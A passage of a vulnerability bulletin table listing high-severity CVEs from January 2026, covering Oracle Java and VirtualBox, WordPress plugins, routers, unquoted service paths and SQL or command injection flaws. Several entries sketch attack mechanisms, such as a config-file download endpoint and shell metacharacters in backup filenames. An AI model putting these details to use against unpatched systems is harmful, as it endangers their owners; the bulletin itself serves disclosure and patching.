| Oracle Corporation--Oracle Java SE | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: AWT, JavaFX). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). | 2026-01-20 | 7.4 | CVE-2026-21932 | Oracle Advisory |
| Oracle Corporation--Oracle Java SE | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 7.5 | CVE-2026-21945 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21955 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21956 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21987 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21988 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data as well as unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L). | 2026-01-20 | 8.1 | CVE-2026-21989 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21990 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 7.5 | CVE-2026-21957 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-01-20 | 7.5 | CVE-2026-21982 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 7.5 | CVE-2026-21983 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 7.5 | CVE-2026-21984 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. Note: This vulnerability applies to Windows VMs only. CVSS 3.1 Base Score 7.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H). | 2026-01-20 | 7.1 | CVE-2026-21986 | Oracle Advisory |
| Oracle Corporation--Siebel CRM Deployment | Vulnerability in the Siebel CRM Deployment product of Oracle Siebel CRM (component: Server Infrastructure). Supported versions that are affected are 17.0-25.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Siebel CRM Deployment. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Siebel CRM Deployment. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 7.5 | CVE-2026-21926 | Oracle Advisory |
| OSAS--OSAS Traverse Extension | OSAS Traverse Extension 11 contains an unquoted service path vulnerability in the TravExtensionHostSvc service running with LocalSystem privileges. Attackers can exploit the unquoted path to inject and execute malicious code by placing executable files in the service's path, potentially gaining elevated system access. | 2026-01-21 | 7.8 | CVE-2021-47864 | ExploitDB-49698 Archived Vendor Homepage VulnCheck Advisory: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path |
| pbatard--rufus | Rufus is a utility that helps format and create bootable USB flash drives. Versions 4.11 and below contain a race condition (TOCTOU) in src/net.c during the creation, validation, and execution of the Fido PowerShell script. Since Rufus runs with elevated privileges (Administrator) but writes the script to the %TEMP% directory (writeable by standard users) without locking the file, a local attacker can replace the legitimate script with a malicious one between the file write operation and the execution step. This allows arbitrary code execution with Administrator privileges. This issue has been fixed in version 4.12_BETA. | 2026-01-22 | 7.3 | CVE-2026-23988 | https://github.com/pbatard/rufus/security/advisories/GHSA-hcx5-hrhj-xhq9 https://github.com/pbatard/rufus/commit/460cc5768aa45be07941b9e4ebc9bee02d282873 https://github.com/pbatard/rufus/releases/tag/v4.12_BETA |
| PDF Complete, Inc.--PDFCOMPLETE Corporate Edition | PDF Complete Corporate Edition 4.1.45 contains an unquoted service path vulnerability in the pdfcDispatcher service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in the service binary location to inject malicious executables that will be run with elevated LocalSystem privileges. | 2026-01-23 | 7.8 | CVE-2021-47896 | ExploitDB-49558 Vendor Homepage Software Download Page VulnCheck Advisory: PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path |
| PEEL eCommerce--PEEL Shopping | PEEL Shopping 9.3.0 contains a stored cross-site scripting vulnerability in the 'Comments / Special Instructions' parameter of the purchase page. Attackers can inject malicious JavaScript payloads that will execute when the page is refreshed, potentially allowing client-side script execution. | 2026-01-23 | 7.2 | CVE-2021-47892 | ExploitDB-49574 Archived Vendor Homepage VulnCheck Advisory: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting |
| PEEL eCommerce--PEEL Shopping | PEEL Shopping 9.3.0 contains a stored cross-site scripting vulnerability in the address parameter of the change_params.php script. Attackers can inject malicious JavaScript payloads that execute when users interact with the address text box, potentially enabling client-side script execution. | 2026-01-23 | 7.2 | CVE-2021-47897 | ExploitDB-49553 Archived Vendor Homepage VulnCheck Advisory: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting |
| PHPGurukul--Directory Management System | A security vulnerability has been detected in PHPGurukul Directory Management System 1.0. Impacted is an unknown function of the file /index.php of the component Search. The manipulation of the argument searchdata leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-01-19 | 7.3 | CVE-2026-1160 | VDB-341754 | PHPGurukul Directory Management System Search index.php sql injection VDB-341754 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #736333 | itsourcecode Directory Management System V1.0 SQL Injection https://github.com/YouSeeYouOneDayDayDe/Nick_1321_vuls/issues/2 https://phpgurukul.com/ |
| phppgadmin--phpPgAdmin | phpPgAdmin 7.13.0 contains a remote command execution vulnerability that allows authenticated attackers to execute arbitrary system commands through SQL query manipulation. Attackers can create a custom table, upload a malicious .txt file, and use the COPY FROM PROGRAM command to execute operating system commands with the application's privileges. | 2026-01-21 | 8.8 | CVE-2021-47853 | ExploitDB-49736 phpPgAdmin Official Release Page VulnCheck Advisory: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution |
| Phreesoft--PhreeBooks | PhreeBooks 5.2.3 contains an authenticated file upload vulnerability in the Image Manager that allows remote code execution. Attackers can upload a malicious PHP web shell by exploiting unrestricted file type uploads to gain command execution on the server. | 2026-01-23 | 8.8 | CVE-2021-47904 | ExploitDB-49524 Official Vendor Homepage ExploitDB-46645 Web Shell Payload Gist VulnCheck Advisory: PhreeBooks 5.2.3 - Remote Code Execution |
| posimyththemes--Nexter Extension Site Enhancements Toolkit | The Nexter Extension - Site Enhancements Toolkit plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.6 via deserialization of untrusted input in the 'nxt_unserialize_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2026-01-20 | 8.1 | CVE-2026-0726 | https://www.wordfence.com/threat-intel/vulnerabilities/id/02de9287-68e4-46ce-a491-3f6cbb7fc0ed?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/nexter-extension/tags/4.4.6/include/panel-settings/extensions/nexter-ext-replace-url.php&new_path=/nexter-extension/tags/4.4.7/include/panel-settings/extensions/nexter-ext-replace-url.php |
| ProFTPD--ProFTPD | ProFTPD 1.3.7a contains a denial of service vulnerability that allows attackers to overwhelm the server by creating multiple simultaneous FTP connections. Attackers can repeatedly establish connections using threading to exhaust server connection limits and block legitimate user access. | 2026-01-21 | 7.5 | CVE-2021-47865 | ExploitDB-49697 ProFTPD Official Website ProFTPD GitHub Repository VulnCheck Advisory: ProFTPD 1.3.7a - Remote Denial of Service |
| pypa--wheel | wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2. | 2026-01-22 | 7.1 | CVE-2026-24049 | https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef https://github.com/pypa/wheel/releases/tag/0.46.2 |
| Quenary--tugtainer | Tugtainer is a self-hosted app for automating updates of Docker containers. In versions prior to 1.16.1, the password authentication mechanism transmits passwords via URL query parameters instead of the HTTP request body. This causes passwords to be logged in server access logs and potentially exposed through browser history, Referer headers, and proxy logs. Version 1.16.1 patches the issue. | 2026-01-19 | 8.1 | CVE-2026-23846 | https://github.com/Quenary/tugtainer/security/advisories/GHSA-f2qf-f544-xm4p https://github.com/Quenary/tugtainer/commit/9d23bf40ac1d39005582abfcf0a84753a4e29d52 |
| Realtek Semiconductor Corp.--Realtek Wireless LAN Utility | Realtek Wireless LAN Utility 700.1631 contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted service path by inserting malicious code in the system root path that would execute during application startup or system reboot. | 2026-01-21 | 7.8 | CVE-2021-47880 | ExploitDB-49646 Realtek Official Homepage VulnCheck Advisory: Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path |
| Rockstar Games--Rockstar Games Launcher | Rockstar Games Launcher 1.0.37.349 contains a privilege escalation vulnerability that allows authenticated users to modify the service executable with weak permissions. Attackers can replace the RockstarService.exe with a malicious binary to create a new administrator user and gain elevated system access. | 2026-01-21 | 8.8 | CVE-2021-47852 | ExploitDB-49739 Rockstar Games Launcher Official Site VulnCheck Advisory: Rockstar Service - Insecure File Permissions |
| runtipi--runtipi | Runtipi is a Docker-based, personal homeserver orchestrator that facilitates multiple services on a single server. Versions 3.7.0 and above allow an authenticated user to execute arbitrary system commands on the host server by injecting shell metacharacters into backup filenames. The BackupManager fails to sanitize the filenames of uploaded backups. The system persists user-uploaded files directly to the host filesystem using the raw originalname provided in the request. This allows an attacker to stage a file containing shell metacharacters (e.g., $(id).tar.gz) at a predictable path, which is later referenced during the restore process. The successful storage of the file is what allows the subsequent restore command to reference and execute it. This issue has been fixed in version 4.7.0. | 2026-01-22 | 8.1 | CVE-2026-24129 | https://github.com/runtipi/runtipi/security/advisories/GHSA-vrgf-rcj5-6gv9 https://github.com/runtipi/runtipi/commit/c3aa948885554a370d374692158a3bfe1cfdc85a https://github.com/runtipi/runtipi/releases/tag/v4.7.0 |
| Sandboxie-Plus--Sandboxie Plus | Sandboxie Plus 0.7.2 contains an unquoted service path vulnerability in the SbieSvc service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup. | 2026-01-21 | 7.8 | CVE-2021-47883 | ExploitDB-49631 Vendor Homepage VulnCheck Advisory: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path |
| Sangfor--Operation and Maintenance Management System | A vulnerability was identified in Sangfor Operation and Maintenance Management System up to 3.0.12. Affected by this issue is the function SessionController of the file /isomp-protocol/protocol/session of the component SSH Protocol Handler. The manipulation of the argument keypassword leads to os command injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-22 | 8.8 | CVE-2026-1324 | VDB-342300 | Sangfor Operation and Maintenance Management System SSH Protocol session SessionController os command injection VDB-342300 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735716 | Sangfor Operation and Maintenance Management System (OSM / è¿ç»´å®‰å…¨ç®¡ç†ç³»ç»Ÿ) 3.0.8 OS Command Injection https://github.com/LX-LX88/cve/issues/20 |
| satndy--Aplikasi-Biro-Travel | Blitar Tourism 1.0 contains an authentication bypass vulnerability that allows attackers to bypass login by injecting SQL code through the username parameter. Attackers can manipulate the login request by sending a crafted username with SQL injection techniques to gain unauthorized administrative access. | 2026-01-21 | 8.2 | CVE-2021-47848 | ExploitDB-49759 Aplikasi Biro Travel GitHub Repository VulnCheck Advisory: Blitar Tourism 1.0 - Authentication Bypass SQLi |
| Security--Winpakpro | WIN-PACK PRO4.8 contains an unquoted service path vulnerability in the ScheduleService that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path in 'C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe' to inject malicious code that would execute during service startup. | 2026-01-21 | 7.8 | CVE-2021-47867 | ExploitDB-49691 Honeywell Product Webpage VulnCheck Advisory: WIN-PACK PRO 4.8 - 'ScheduleService' Unquoted Service Path |
| SEO Panel--SEO Panel | SEO Panel versions prior to 4.9.0 contain a blind SQL injection vulnerability in the archive.php page that allows authenticated attackers to manipulate database queries through the 'order_col' parameter. Attackers can use sqlmap to exploit the vulnerability and extract database information by injecting malicious SQL code into the order column parameter. | 2026-01-21 | 7.1 | CVE-2021-47872 | ExploitDB-49666 Official SEO Panel Homepage SEO Panel 4.9.0 Release GitHub Issue #209 VulnCheck Advisory: SEO Panel < 4.9.0 - 'order_col' Blind SQL Injection |
| shazdeh--Administrative Shortcodes | The Administrative Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.3.4 via the 'slug' attribute of the 'get_template' shortcode. This is due to insufficient path validation on user-supplied input passed to the get_template_part() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2026-01-24 | 7.5 | CVE-2026-1257 | https://www.wordfence.com/threat-intel/vulnerabilities/id/119fe499-88c4-413f-a44a-2b3acfdbdeb5?source=cve https://plugins.trac.wordpress.org/browser/administrative-shortcodes/trunk/administrative-shortcodes.php#L144 https://wordpress.org/plugins/administrative-shortcodes https://plugins.trac.wordpress.org/browser/administrative-shortcodes/tags/0.3.4/administrative-shortcodes.php#L144 |
| Shenzhen Tenda Technology Co.,Ltd.--Tenda D151 & D301 | Tenda D151 and D301 routers contain an unauthenticated configuration download vulnerability that allows remote attackers to retrieve router configuration files. Attackers can send a request to /goform/getimage endpoint to download configuration data including admin credentials without authentication. | 2026-01-21 | 7.5 | CVE-2021-47802 | ExploitDB-49782 Tenda Official Vendor Homepage VulnCheck Advisory: Tenda D151 & D301 - Configuration Download |
| sibercii6-crypto--teklifolustur_app | teklifolustur_app is a web-based PHP application that allows users to create, manage, and track quotes for their clients. Prior to commit dd082a134a225b8dcd401b6224eead4fb183ea1c, an Insecure Direct Object Reference (IDOR) vulnerability exists in the offer view functionality. Authenticated users can manipulate the offer_id parameter to access offers belonging to other users. The issue is caused by missing authorization checks ensuring that the requested offer belonged to the currently authenticated user. Commit dd082a134a225b8dcd401b6224eead4fb183ea1c contains a patch. | 2026-01-19 | 7.1 | CVE-2026-23843 | https://github.com/sibercii6-crypto/teklifolustur_app/security/advisories/GHSA-6h9r-mmg3-cg7m https://github.com/sibercii6-crypto/teklifolustur_app/commit/dd082a134a225b8dcd401b6224eead4fb183ea1c |
| SIPp--SIPp | A flaw was found in SIPp. A remote attacker could exploit this by sending specially crafted Session Initiation Protocol (SIP) messages during an active call. This vulnerability, a NULL pointer dereference, can cause the application to crash, leading to a denial of service. Under specific conditions, it may also allow an attacker to execute unauthorized code, compromising the system's integrity and availability. | 2026-01-23 | 8.4 | CVE-2026-0710 | https://access.redhat.com/security/cve/CVE-2026-0710 RHBZ#2427788 |
| Softros Systems--LAN Messenger | Softros LAN Messenger 9.6.4 contains an unquoted service path vulnerability in the SoftrosSpellChecker service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\' to inject malicious executables and escalate privileges. | 2026-01-23 | 7.8 | CVE-2021-47889 | ExploitDB-49588 Vendor Homepage VulnCheck Advisory: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path |
| Softros Systems--LogonExpert | LogonExpert 8.1 contains an unquoted service path vulnerability in the LogonExpertSvc service running with LocalSystem privileges. Attackers can exploit the unquoted path to place malicious executables in intermediate directories, potentially gaining elevated system access during service startup. | 2026-01-23 | 7.8 | CVE-2021-47890 | ExploitDB-49586 Vendor Homepage Software Download Link VulnCheck Advisory: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path |
| Solvera Software Services Trade Inc.--Teknoera | Unrestricted Upload of File with Dangerous Type vulnerability in Solvera Software Services Trade Inc. Teknoera allows File Content Injection. This issue affects Teknoera: through 01102025. | 2026-01-22 | 8.1 | CVE-2025-10856 | https://www.usom.gov.tr/bildirim/tr-26-0003 |
| Solvera Software Services Trade Inc.--Teknoera | Authorization Bypass Through User-Controlled Key vulnerability in Solvera Software Services Trade Inc. Teknoera allows Exploitation of Trusted Identifiers. This issue affects Teknoera: through 01102025. | 2026-01-22 | 7.5 | CVE-2025-10855 | https://www.usom.gov.tr/bildirim/tr-26-0003 |
| specialk--User Submitted Posts Enable Users to Submit Posts from the Front End | The User Submitted Posts - Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom fields in all versions up to, and including, 20251210 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 7.2 | CVE-2026-0800 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec907bc-bd10-4dc5-be35-4f2aaf5ef444?source=cve https://plugins.trac.wordpress.org/changeset/3436859/user-submitted-posts |
| Tenda--AX1803 | A flaw has been found in Tenda AX1803 1.0.0.1. The affected element is the function fromGetWifiGuestBasic of the file /goform/WifiGuestSet. Executing a manipulation of the argument guestWrlPwd/guestEn/guestSsid/hideSsid/guestSecurity can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been published and may be used. | 2026-01-22 | 8.8 | CVE-2026-1329 | VDB-342305 | Tenda AX1803 WifiGuestSet fromGetWifiGuestBasic stack-based overflow VDB-342305 | CTI Indicators (IOB, IOC, IOA) Submit #736063 | Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow Submit #736064 | Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow (Duplicate) Submit #736065 | Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow (Duplicate) Submit #736066 | Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow (Duplicate) Submit #736067 | Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow (Duplicate) https://river-brow-763.notion.site/Tenda-AX1803-Buffer-Overflow-in-fromGetWifiGusetBasic-2e3a595a7aef80a78225db34317daa40#2e3a595a7aef801ab517e4af5631227a https://www.tenda.com.cn/ |
| The Textpattern Development Team--Textpattern | Textpattern versions prior to 4.8.3 contain an authenticated remote code execution vulnerability that allows logged-in users to upload malicious PHP files. Attackers can upload a PHP file with a shell command execution payload and execute arbitrary commands by accessing the uploaded file through a specific URL parameter. | 2026-01-23 | 8.8 | CVE-2021-47888 | ExploitDB-49620 Official Vendor Homepage Textpattern Software Download Page VulnCheck Advisory: Textpattern 4.8.3 - Remote code execution |
| Tosei--Online Store Management System | A vulnerability was determined in Tosei Online Store Management System ãƒãƒƒãƒˆåº—舗管ç†ã‚·ã‚¹ãƒ†ãƒ 1.01. The affected element is an unknown function of the file /cgi-bin/imode_alldata.php. Executing a manipulation of the argument DevId can lead to command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1192 | VDB-341777 | Tosei Online Store Management System ãƒãƒƒãƒˆåº—舗管ç†ã‚·ã‚¹ãƒ†ãƒ imode_alldata.php command injection VDB-341777 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734205 | Tosei Tosei Online Store Management System ãƒãƒƒãƒˆåº—舗管ç†ã‚·ã‚¹ãƒ†ãƒ 1.01 Command Injection https://www.yuque.com/yuqueyonghuexlgkz/zepczx/keenhf9u2bnw5o6g |
| TOTOLINK--A3700R | A weakness has been identified in TOTOLINK A3700R 9.1.2u.5822_B20200513. This affects the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi. Executing a manipulation of the argument ssid can lead to buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-19 | 8.8 | CVE-2026-1143 | VDB-341735 | TOTOLINK A3700R cstecgi.cgi setWiFiEasyGuestCfg buffer overflow VDB-341735 | CTI Indicators (IOB, IOC, IOA) Submit #735502 | TOTOLINK A3700R V9.1.2u.5822_B20200513 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-A3700R-setWiFiEasyGuestCfg-2e353a41781f8057a244ead07d5eaaff?source=copy_link https://www.totolink.net/ |
